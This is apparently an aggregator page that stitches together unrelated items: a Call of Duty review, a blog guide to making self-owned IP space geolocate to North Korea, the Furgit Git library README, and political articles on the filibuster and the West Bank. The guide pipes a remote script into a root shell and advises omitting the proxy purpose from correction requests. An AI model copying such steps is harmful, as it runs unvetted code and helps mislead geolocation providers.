Because make no mistake, the heart of the game is the traditional multiplayer, which brings fresh modes, guns and gadgets to the standard Call of Duty experience: 12 players in a small location pulverising each other in operettas of mechanised slaughter. New maps such as those set in a Tokyo-inspired shopping district and a deep sea rig are efficiently designed chambers of death, with alleyways, high-up windows and open squares to direct players towards one another with vicious style and intent. My favourite is the Alaska base map Imprint, where a moving platform makes taking objective points in the Domination and Hardpoint modes incredibly messy and disorientating. A new wall jumping ability has opened up the verticality of the locations, allowing players to find new routes around the complex architecture. If you’ve never been into the turbocharged twitchcore savagery of the Call of Duty online experience, this isn’t going to change your mind, but there’s a lot here to enjoy for perennial conscripts of carnage.

Then you have the Zombies mode, another online co-op offering, taking place in a vast nightmarish hellzone of abandoned frontier towns and irradiated wastelands. Here, players take on wave after wave of zombie monsters while upgrading their weapons and abilities in order to hold out as long as possible. It’s a return to the round-based structure of previous Zombies entries, with lots of new weapons and features, including the ability to drive from area to area in a pickup truck while blasting rampaging monsters off the bonnet. It feels like taking part in some sort of crazed theme park ride, and again, a real hoot with a bunch of likeminded pals.

Additionally, there’s Dead Ops Arcade 4, a self-contained top down twin-stick shooter for up to four players. This extra was born as a side project by members of the original Black Ops team, and hidden within the main game. Now it’s back and it’s a blast in its own right, reminding old school fans of multi-directional shooters such as Smash TV and Geometry Wars ; there are even little playable mini-games between stages which take in genres such as top down racers and horizontal scrolling shoot-’em-ups – so grandad can play too!

Add in the usual refresh to battle royale mode Warzone and you have an exhaustive package for Call of Duty fans. Whatever you think about the series and its problematic role in how the mainstream games industry works, how it is perceived and the types of communities it engenders, this is slick, thrilling entertainment. Nowhere else will you be blasting a giant robot in a corporate science lab one minute, and then playing a modern take on Atari’s Super Sprint the next. Value matters right now, and in this as in almost everything else, Call of Duty does not hold back. It is a maximalist paean to the ultimate, troubling truth of video game design – shooting stuff on a TV screen is a hell of a lot of fun.

  • Call of Duty: Black Ops 7 is out now; from £69.99

How to Get a North Korea / Antarctica VPS

Lobsters
blog.lyc8503.net
2025-11-14 05:23:04
Comments...
Original Article

This article is currently an experimental machine translation and may contain errors. If anything is unclear, please refer to the original Chinese version. I am continuously working to improve the translation.

Introduction

This blog post should be the final part of the “Running Your Own ISP at Home” series, and we’re going to talk about how to modify the geolocation of the IP addresses we announce.

By tweaking IP geolocation, you can:

  • Display absurd IP locations on various platforms — for example, Antarctica (which barely has internet infrastructure), North Korea (which isn’t connected to the global internet), or some obscure tiny country with only tens of thousands of people
  • Use a single VPS to obtain IP addresses from all over the world, show off on probe networks and achieve a weird kind of “All In One” status (yep, even this is All In One now)
  • Unlock region-locked streaming services — see this hostloc thread
  • Run a one-man IDC selling VPSes from all corners of the globe — I found one called GlobalVM, but haven’t tried it, so no recommendation. Feel free to search on your own.

This article will mainly focus on modifying IP geolocation and using WARP to get a corresponding-region IPv4 address. Unlocking streaming content and running an IDC won’t be covered in depth — refer to the link above if interested.

Prerequisites

This is probably common knowledge for many, but for completeness, let’s go over it briefly.

IP Databases

IP database providers compile mappings from IP → geographical location using methods like network scanning and WHOIS lookups. They also include data such as IP threat scores and type (residential, server, or VPN). These databases are sold to users — typically websites — which then query them in the backend to display location info and perform risk assessment. A handy tool for querying multiple geolocation databases at once: https://iplark.com/

Popular IP databases include Maxmind, IPInfo, and DB-IP. Smaller databases often sync data from larger ones.
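For a quick spot-check of what a particular database currently returns, most of them expose a simple lookup API. As an illustration (not part of the original walkthrough), IPInfo can be queried with curl; the address below is just a well-known placeholder, and anonymous lookups are rate-limited:

curl https://ipinfo.io/8.8.8.8/json
# Returns a small JSON object with fields like "city", "region", "country", and "org"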

WARP

WARP is a WireGuard-based VPN service provided by Cloudflare. While they offer an official Linux client, most people use native WireGuard to connect. WARP can provide your server with both IPv4 and IPv6 addresses, commonly used to add IPv4 connectivity to IPv6-only VPSes (or vice versa). One key feature of WARP is that the public IP it assigns will have the same geolocation as the IP you’re connecting from — we’ll use this property later. For a detailed WARP setup guide, check out: https://p3terx.com/archives/use-cloudflare-warp-to-add-extra-ipv4-or-ipv6-network-support-to-vps-servers-for-free.html

Submitting Geolocation Correction Requests

In reality, the “location” of an IP is inherently fuzzy. For instance, my 2a14:7c0:4d00::/40 block was originally allocated to Israel. But later, I bought parts of this range and announced them via BGP in Germany, the US, and Singapore (see previous article on Anycast networks ). Meanwhile, I’m physically located in mainland China. As the owner of this IP block, I can also freely edit the country field in the WHOIS database — and I set it to KP (North Korea).

Because of this ambiguity, it’s nearly impossible to precisely determine an IP’s location using any single technical method. As a result, almost all geolocation databases accept public/user-submitted correction requests.

Preparation

Before submitting any requests, let’s do a little prep work.

IP databases collect IP ranges from global routing tables. Previously, we were announcing the entire 2a14:7c0:4d00::/40 block without subdividing it in RIPE NCC, which makes it harder for databases to process smaller segments. So let’s fix that.

Log in to the RIPE Database, go to My Resources → IPv6 → Create assignment, and fill out the form to create a new inet6num (which represents an IPv6 address block):

  • inet6num: Enter a subnet. The smallest allowed is /48, so I entered 2a14:7c0:4d00::/48. If you only own a /48, you can’t subdivide further — you can only edit the LIR-assigned block.
  • netname: Pick a name you like
  • country: Choose the country/region you want this IP block to appear in
  • admin-c & tech-c: Fill in two contact objects — use the ones you created earlier
  • status: Select ASSIGNED to indicate it’s assigned

Form for creating a new inet6num

After creation, you can see all your subnets under “My Resources”:

Viewing subnets under the LIR-assigned block
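Once the new object exists, a plain WHOIS query is an easy way to confirm what the public database now serves. Below is a rough sketch of the kind of response you would see for the /48 created above; the netname and contact handles are placeholders, not the real values:

whois -h whois.ripe.net 2a14:7c0:4d00::/48

# Abridged, representative output:
# inet6num:       2a14:7c0:4d00::/48
# netname:        EXAMPLE-NET        <- whatever name you picked
# country:        KP                 <- the country chosen in the form
# admin-c:        EXMP1-RIPE         <- placeholder contact handle
# tech-c:         EXMP1-RIPE
# status:         ASSIGNED
# source:         RIPE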

Next, update the BIRD configuration from our previous article, changing 2a14:7c0:4d00::/40 to 2a14:7c0:4d00::/48, then restart BIRD.
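The exact edit depends on how the BIRD configuration from the earlier article is structured. As a minimal sketch, assuming the prefix is originated from a static protocol in BIRD 2 (the protocol name here is a placeholder), the change amounts to:

# bird.conf (sketch)
protocol static announce_v6 {
    ipv6;
    route 2a14:7c0:4d00::/48 unreachable;   # previously: route 2a14:7c0:4d00::/40 unreachable;
}

# Apply the change: birdc configure reloads the config, or simply restart the BIRD daemon as above
birdc configure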

After some time, use BGP Tools to verify that 2a14:7c0:4d00::/48 is now visible. The old /40 page should return 404.

Submitting Correction Requests

You can submit geolocation correction requests to common IP databases: Maxmind, IPInfo, Google

If asked for justification, write something like “Due to incorrect IP geolocation, I/my clients cannot access region-restricted websites” (in English). Avoid mentioning use for anonymous proxies — that might violate their correction policies.

Each database has its own review process. Some involve manual checks, and changes usually take 3 days to 2 weeks to go live. Most offer online lookup tools (like Maxmind’s Demo) — you can use them to check progress, or use IPLark for batch queries.
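If you prefer checking locally rather than through the web demos, MaxMind’s freely downloadable GeoLite2 database can be queried with mmdblookup from libmaxminddb. This is a sketch, assuming you have already downloaded GeoLite2-Country.mmdb into the current directory:

mmdblookup --file GeoLite2-Country.mmdb --ip 2a14:7c0:4d00::1 country iso_code
# Once the correction has made it into a database release, this prints something like:
#   "KP" <utf8_string>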

In my test, IPInfo accepted my request within a week. Maxmind didn’t respond after two weeks, so I followed up via their contact form, and they finally approved it. (Wait a bit first — only reach out after multiple failed submissions.)

(p.s. Recently, Maxmind has been rejecting requests to set location to Antarctica (AQ) — probably too many people trying to go there. That’s why this article uses North Korea as an example. If you really want an Antarctica IP, try the geofeed method at the end to bypass manual review.)

Below is for reference only — feel free to craft your own justification:

Q: Hello, I am the network operator and owner of AS214775. I found out that my IP address segment 2a14:7c0:4d00::/40 is incorrectly localized to Israel, causing me to be denied access to other websites. I have tried several times to submit data corrections using the data correction form, but no response. I have corrected the country of my IP segment in the RIPE NCC database, and some other databases such as ipinfo.io have been synchronized, but Maxmind keeps locating my IP segment to Israel. I would like to politely ask why MaxMind has not responded to my correction request?

A: Thank you for your email. This will be updated in Tuesday’s release of the database.

Using WARP to Get a Region-Matched IPv4

Cloudflare uses Maxmind’s database, so as long as Maxmind reflects your desired location, WARP will follow suit. Note that Cloudflare may lag behind Maxmind by 1–2 weeks. If Maxmind shows the correct location but Cloudflare hasn’t updated, just wait a little longer.

WARP assigns IPv4 (and IPv6) addresses based on your connection IP’s geolocation. The IPv4 address not only allows access to IPv4-only sites, but its geolocation is maintained by Cloudflare — highly accurate and consistent across databases, much more reliable than manually submitting corrections everywhere.

We’ve already introduced WARP, so let’s jump straight into setup using this guide:

curl -fsSL git.io/wgcf.sh | sudo bash
wgcf register
wgcf generate

vim wgcf-profile.conf

ip -6 route add <WARP_server_IP>/128 via <IPv6_gateway> dev eth0 src <your_AS's_IPv6_address>
# Example: ip -6 route add 2606:4700:d0::a29f:c001/128 via 2a03:d9c0:2000::5 dev eth0 src 2a14:7c0:4d00::1

cp wgcf-profile.conf /etc/wireguard/warp.conf
wg-quick up warp

Now test your VPS’s IPv4 geolocation using Cloudflare’s /cdn-cgi/trace endpoint (available on any site behind CF). ip=104.28.212.208 means we got that IP, colo=DUS means we’re connecting via the DUS (Düsseldorf Airport) data center (IATA code), loc=IL means geolocation is IL (Israel) (country code), and warp=on confirms WARP is active:

We did successfully change our location, but loc=IL means Cloudflare hasn’t picked up Maxmind’s update yet — let’s wait a bit longer

root@s39230 ~ 
fl=910f1
h=www.cloudflare.com
ip=104.28.212.208
ts=1731586511.237
visit_scheme=https
uag=curl/7.88.1
colo=DUS
sliver=none
http=http/2
loc=IL
tls=TLSv1.3
sni=plaintext
warp=on
gateway=off
rbi=off
kex=X25519


root@s39230 ~
{"code":0,"msg":"","message":"","data":{"addr":"104.28.212.210","country":"Israel","province":"Jerusalem District","city":"Jerusalem","isp":"cloudflare.com","latitude":"31.768319","longitude":"35.21371"}}

After nearly ten real-world days, Cloudflare WARP finally updated its database! Even slower than Cloudflare’s other services… At this point, it had been about two weeks since Maxmind updated, and a full month since my first correction request — almost missed the deadline before my server expired (thankfully, it didn’t).

Retest, and now we see the new IP 104.28.197.243 returns loc=KP, and Bilibili’s API shows North Korea:

root@s39230 ~ 
fl=48f122
h=www.cloudflare.com
ip=104.28.197.243
ts=1732203935.881
visit_scheme=https
uag=curl/7.88.1
colo=DUS
sliver=none
http=http/2
loc=KP
tls=TLSv1.3
sni=plaintext
warp=on
gateway=off
rbi=off
kex=X25519

root@s39230 ~
{"code":0,"msg":"","message":"","data":{"addr":"104.28.197.248","country":"North Korea","province":"Pyongyang","city":"","isp":"cloudflare.com","latitude":"39.073798","longitude":"125.819764"}}

Let’s check our own IPv6 and WARP-assigned IPv4 using IPLark:

Our IPv6 is only recognized as North Korea by Maxmind — others think it’s Antarctica or Germany — all over the place (but 80% of sites rely on Maxmind anyway)

WARP-assigned IPv4 is consistently shown as North Korea

Now just set up a proxy on this VPS, and you can proudly flaunt your North Korean IP across the web. (If you’ve read this far, I assume you know how to set up a proxy.)

Final proof: a real Bilibili comment screenshot 🤣

Optional: Geofeed and Preventing Reversion

Lastly, the promised “Light Up the Globe” trick. For large providers with IPs all over the world, manually submitting corrections isn’t practical.

That’s where Geofeed comes in — a standard allowing bulk geolocation submissions: https://docs.ipdata.co/docs/publishing-a-geofeed. Besides submitting your Geofeed via support ticket to Maxmind, you can also embed the Geofeed URL in the inet6num object in WHOIS, allowing databases to automatically crawl and update your IP locations. With this, you can get IPs from all sorts of bizarre countries, show off on probe dashboards and achieve “Light Up the Globe” status.
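Concretely, a geofeed is just a small CSV file in RFC 8805 format (prefix, country, region, city, postal code) hosted at a stable HTTPS URL and referenced from your WHOIS object. A minimal sketch, with an illustrative URL and prefixes:

# geofeed.csv, served at e.g. https://example.net/geofeed.csv
2a14:7c0:4d00::/48,KP,,,
2a14:7c0:4d01::/48,AQ,,,

# Referenced from the inet6num object; the RIPE database has a dedicated
# "geofeed:" attribute for this (older objects sometimes use a remarks: line instead):
# geofeed:        https://example.net/geofeed.csv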

IP geolocation isn’t set-and-forget — databases may re-scan and revert your location. To reduce this risk, block ICMP (ping) and common ports via firewall to avoid scanning. Also, avoid using your server’s native IPv6 to browse the web — stick to WARP-assigned IPv4. Some providers (cough Google cough) may even use client-side (mobile) location to correct server IP geolocation. See this article for details.
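As a rough nftables sketch of the idea (the table name and port choices are illustrative; only ICMP/ICMPv6 echo requests are dropped, since dropping all of ICMPv6 would break neighbour discovery, and take care not to cut off your own SSH access):

nft add table inet scanguard
nft 'add chain inet scanguard input { type filter hook input priority 0; policy accept; }'
# Stop answering ping so periodic re-scans see the prefix as unresponsive
nft add rule inet scanguard input icmpv6 type echo-request drop
nft add rule inet scanguard input icmp type echo-request drop
# Optionally hide common service ports from scanners as well
nft add rule inet scanguard input tcp dport '{ 80, 443 }' drop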

Conclusion

Finally… Planning for this series began in June 2024; it went through countless hurdles and waiting periods, and it now wraps up just before December. If I had waited any longer, my ASN and server would’ve expired (quietly).

We’ve explored setting up and maintaining an autonomous system on the Internet, configured BGP, peers, Anycast, and now IP geolocation spoofing — satisfying some bizarre curiosities, and gaining a new appreciation for ISPs and one-man IDCs (or not) .

I might try DN42 next, or maybe not. For now, this series ends here. See you in the next blog post~ o/

Furgit: fast implementation of Git in pure Go

Lobsters
github.com
2025-11-14 04:48:43
Comments...
Original Article

Furgit

builds.sr.ht status Go Reference

Furgit is a fast implementation of Git in pure Go, extracted from an internal package of Lindenii Villosa .

Furgit is in initial development, does not have tagged releases yet, and guarantees that the API will break every now and then. Do not use in production.

Furgit does not focus on command-line utilities; in particular, it does not intend to replace upstream git . It is intended to be used as a library.

Features

Currently, Furgit is very basic; it supports reading objects from loose objects and packfiles. There is some infrastructure in the tests for writing loose objects and packfiles, but it needs to be refactored.

Performance

Furgit is aggressively optimized for performance. As of November 2025, for large repos such as Linux, it is:

Compatibility

  • We only aim to support UNIX-like operating systems that have syscall.Mmap .
  • Currently, this version of Furgit only supports SHA-1 hashes. However, the upstream Villosa project only uses SHA-256 hashes. You may edit two lines in hash.go to trivially switch to SHA-256; a sketch of the kind of change involved is shown below.
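For illustration only, here is the kind of two-line swap implied; the identifiers below are hypothetical and do not match the actual contents of hash.go:

// Hypothetical sketch; Furgit's real hash.go uses different names.
package furgit

import (
	"crypto/sha256" // was: "crypto/sha1"
	"hash"
)

const HashSize = sha256.Size // was: sha1.Size (20 bytes); sha256.Size is 32

func newHasher() hash.Hash { return sha256.New() } // was: sha1.New()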

Development

Etymology

I was thinking of names and I accidentally typed "git" as "fur" (i.e., left shifted one key on my QWERTY keyboard).

License

Currently, GNU Affero General Public License, version 3 only.

As an exception, pack_idx.go (responsible for .idx files which index packfiles) is public domain; I'd be happy to see a port of it to go-git , although achieving the same level of performance likely requires memory mapping.

Domain-specific Languages and Code Synthesis Using Haskell

Lobsters
queue.acm.org
2025-11-14 04:44:36
Comments...
Original Article


Democrats Caved In the Shutdown Because of the Filibuster

Portside
portside.org
2025-11-14 04:40:06
Democrats Caved In the Shutdown Because of the Filibuster jay Thu, 11/13/2025 - 23:40 ...
Original Article
Democrats Caved In the Shutdown Because of the Filibuster

The leadership of the Democratic Party wanted to preserve the filibuster for one reason: it checks anyone who defies party orthodoxy. | Photo: Daniel Heuer / Bloomberg // Jacobin

Why did the Democrats cave in on the shutdown? It seems clear that the main issue was not electoral backlash, since most of the senators who caved are not up for reelection, and the politics were trending in the Democrats’ favor, or at least not against them.

The main issue was the filibuster. There was growing pressure from Donald Trump on the Republicans to get rid of it, and the Democratic leadership had every reason to fear its elimination. Why?

It has very little to do with preserving their power while they are in the minority; that ship has obviously sailed.

The Democratic leadership doesn’t want to get rid of the filibuster for the same reason the Republican leadership doesn’t want to get rid of it: The filibuster allows the leadership of both parties to keep their radical flanks at bay. Chuck Schumer needs the filibuster to protect himself from the Bernie Sanders wing in the Senate and the Alexandria Ocasio-Cortez (AOC) wing in the House: if you can’t get to sixty, Bernie and AOC, we have to follow the lead of Joe Manchin and Kyrsten Sinema. The same goes for John Thune with respect to whoever inhabits the radical role in the GOP at any given moment.

You have to read the media coverage on this issue carefully. Usually, the blah blah blah of filibuster reportage is about the party worrying what happens when it is in the minority or individual senators worrying about losing their individual power. That’s the buzz of Broderism, a style of reporting that’s a holdover from the last century.

The real moment of truth comes in a nugget like this, from an article in the New York Times on November 4, which got lost amid the excitement about the Zohran Mamdani election:

In reality, the filibuster also serves Republicans as a handy check on a president who sometimes takes stances that carry substantial risk or defy party orthodoxy, an excuse for Senate Republicans to avoid doing things they don’t see as sound policy or politics without infuriating Mr. Trump.

For Trump, swap in Trump’s most rabid allies and foot soldiers in the Senate and the House — or Schumer’s and Hakeem Jeffries’s enemies in the Senate and the House — and you get a pretty clear sense of why the leaderships of both parties need the filibuster: It checks anyone who “defies party orthodoxy,” while providing “an excuse to avoid doing things.”

[The author of this piece wrote The Reactionary Mind: Conservatism from Edmund Burke to Donald Trump and is a contributing editor at Jacobin.]

Jacobin’s fall issue, “Borders,” is out now. Follow this link to get a discounted subscription to our beautiful print quarterly.

DoorDash hit by new data breach in October exposing user information

Bleeping Computer
www.bleepingcomputer.com
2025-11-14 04:38:44
DoorDash has disclosed a data breach that hit the food delivery platform this October. Beginning yesterday evening, DoorDash, which serves millions of customers across the U.S., Canada, Australia, and New Zealand, started emailing those impacted by the newly disclosed security incident. [...]...
Original Article

DoorDash

DoorDash has disclosed a data breach that hit the food delivery platform this October.

Beginning yesterday evening, DoorDash, which serves millions of customers across the U.S., Canada, Australia, and New Zealand, started emailing those impacted by the newly disclosed security incident.

Your personal information affected

"On October 25, 2025, our team identified a cybersecurity incident that involved an unauthorized third party gaining access to and taking certain user contact information, which varied by individual," states the email notification from DoorDash.


The information may have included:

  • First and last name
  • Physical address
  • Phone number
  • Email address

"Our investigation has since confirmed that your personal information was affected."

DoorDash email notifications disclosing security incident from October (BleepingComputer)

The incident has been traced to a DoorDash employee falling victim to a social engineering scam. Upon becoming aware, the company's incident response team shut down the unauthorized party's access, started an investigation, and referred the matter to law enforcement.

This marks the third notable security incident suffered by the delivery giant.

In 2019, a data breach at DoorDash had exposed the information of roughly 5 million customers , Dashers and merchants to an unauthorized party.

In August 2022, DoorDash suffered another data breach from the threat actors who had also attacked Twilio that year.

“La traduction française suit” (“The French translation follows”)

What's interesting is that a French translation of the notice is appended to these emails:

French translation of the security incident disclosure (BleepingComputer)

At this time, it appears that the emails primarily went to DoorDash Canada users (including myself). We are yet to confirm if the breach also impacts users based in the US and other regions where DoorDash operates.

However, an undated security advisory posted on DoorDash's website includes wording that suggests the incident may extend beyond Canada, including references to US-specific data types, like Social Security Numbers (SSNs), which DoorDash says were not accessed. (The Canadian counterpart would have been Social Insurance Numbers, or SINs.)

BleepingComputer has approached the DoorDash press team with additional questions to seek clarification on the matter.

'Took 19 whole days'

Some users on social media have rebuked DoorDash, questioning the company's handling of the incident and the timing of the notifications.

"I'm sorry - if this isn't sensitive information, what is? Don't downplay this just because they didn't get credit card or password information. It's gone deaf," posted Chris from Toronto.

Cybersecurity professional Kostas T. also reacted to the email's phrasing, expressing that the statement "no sensitive information was accessed" conflicted with the personal information that the company acknowledged was accessed.

"DoorDash took 19 whole days to notify me of a data breach that has leaked my personal information. Thankfully I used a fake name and forwarded email address for my account, but my real phone number and physical address have been leaked," wrote X user itsohqay.

"This is incredibly unprofessional, dangerous, and potentially illegal behaviour from DoorDash... This process violates Canadian data breach law. I'll be filing a case against DoorDash in provincial small claims court and making a complaint to the Office of the Privacy Commissioner of Canada."

Users should be wary of unsolicited communications or targeted phishing emails appearing to originate from DoorDash.

DoorDash warns users to avoid clicking on links or attachments in suspicious emails and to refrain from providing any personal information to unfamiliar websites.

"We have already taken steps to respond to the incident, including deploying enhancements to our security systems, implementing additional training for our employees, bringing in a leading cybersecurity forensic firm to assist in our investigation of this issue, and notifying law enforcement for ongoing investigation," states the company.

DoorDash users with questions about the incident can call the toll-free number +1-833-918-8030 and cite reference code B155060.

BleepingComputer is awaiting a response from DoorDash on the exact scope of the incident.


Under the Radar, Quiet and Persistent Population Transfer Is Underway in the West Bank

Portside
portside.org
2025-11-14 04:26:39
Under the Radar, Quiet and Persistent Population Transfer Is Underway in the West Bank ...
Original Article

Nabi Samwil, in September. The village lies in the Seam Zone: an immense area open to Israelis and closed to Palestinians. | Photo credit: Yahel Gazit / Haaretz

As the strike force of Yesha-stan (combining Yesha, the official acronym for Judea, Samaria and Gaza, with the state-like suffix -stan) devotedly carries out its missions in the West Bank, expelling as many Palestinians as possible from their lands, another, quieter expulsion is taking place away from the headlines.

Its violence is not carried out with iron bars or live ammunition, but with orders and regulations crafted by nameless, well-dressed legal experts, signed by army generals, and approved by Israel's High Court of Justice.

This population transfer is better known by the name Seam Zone: an immense area of about 320,000 dunams (nearly 124 square miles) lying between the separation barrier deep inside the West Bank and the Green Line – open to Israelis and closed to Palestinians.

Israelis and tourists are free to move around there at will and to expand their suburban settlements, which are illegal under international law. For Palestinians living in the territory occupied by Israel in 1967, this mostly rural area is their natural land reserve, now pushed beyond the proverbial mountains of darkness.

The minority among them - farmers from villages between Qalqilya and Ya'bad who had been granted entry permits - were banned from accessing their lands there for the past two years. After petitions by the Israeli human rights group HaMoked, a few farmers recently received permission for just two or three days of olive harvesting. They soon regretted going: their hearts broke at the sight of withered trees and long-neglected groves.

When the true experts on Israeli policy – the Palestinians, the left, and human rights organizations – warned in the early 2000s that the separation barrier's route was designed to seize more fertile land, state officials rolled their eyes and scoffed: "Us? Wanting as much land as possible with as few Palestinians as possible? Come on. Where did you get that idea? Security is our only concern."

Meanwhile, the Yesha-stan marauders set up pirate caravans and livestock pens just meters from Palestinian olive groves, then claim that the harvest poses a security threat. It is their God-given right, therefore, to attack harvesters until they bleed.

The state, for its part, condemns the population it occupied in 1967 to an eternal fate as rightless subjects, treating every water well, market, or organized tour in the artificially designated Area C as a punishable offense. In the Seam Zone – Area C squared – the restrictions are so draconian that the few thousand Palestinians who live in villages trapped inside it can reside in their own homes only if Israel deigns to issue them special permits.

Recently, the residents of three villages northwest of Jerusalem – Beit Iksa, Nabi Samwil and Khalaila – were added to this trapped population. For them, this is hardly a dramatic change: they have long been completely cut off from their relatives, friends and workplaces. For 20 years they have faced severe restrictions on movement and construction. Once, a lively area connected these villages to each other and to their fields and orchards. Now, it has been "cleansed" of Palestinians and effectively annexed to Israel.

Today, however, residents of these three villages must also obtain Israeli permits simply to live in their own homes. Several hundred have not received such permits; several dozen have been told they never will. Israeli bureaucrats, dutifully following orders, will decide whose permits to revoke in the future, free to invent new "residential conditions" as needed.

This is a quiet, ongoing expulsion, and one that unfolds beneath the radar. It helps explain why most Israelis are not truly shocked by the bloody, unrestrained expulsions carried out by the "envoys of the Almighty," and why they are not filling the streets in protest to stop it. In the end, everyone supports a real-estate bonanza for Jews.

Amira Hass is a reporter and columnist for Ha’aretz Daily, a newspaper based in Tel Aviv, Israel. She has been a journalist for two decades.

Hass has written critically about both Israeli and Palestinian authorities. She has not allowed her gender, ethnicity or nationality – all hindrances in the region she reports from – to obstruct her from pursuing the truth in her reporting.

In 1989, Hass quit her studies in history at Tel Aviv University and began working as a copy editor for Ha’aretz Daily. At the same time, she volunteered for Workers Hotline, a human rights group dedicated to reaching out to vulnerable workers, many of whom were Palestinian. She became acquainted with life in Gaza and grew frustrated about how poorly Israel’s occupation of Gaza was represented in the Israeli press.

By 1991, Hass was writing weekly features for Ha’aretz Daily, and in 1993, she became a full-time writer for the paper. She moved to Gaza, which at the time was under direct and full Israeli occupation.

Hass, now based in Ramallah, has lived in the Occupied Palestinian territories for nearly 30 years. She has been reporting on the life of Palestinians under the Israeli occupation and covering the major armed clashes and Israeli military attacks. Her goal has been to provide her readers with detailed information about Israeli policies, especially restrictions on the freedom of movement.

In the course of her work, Hass has been threatened, harassed and detained. In May 2009, she was detained by Israeli police on her return from a four-month stay in Gaza “for violating a military order” (which forbids entry into Gaza) and “for staying illegally in an enemy state.” She had also been detained in December 2008 by Israeli police on her return to Ramallah for violating the same military order.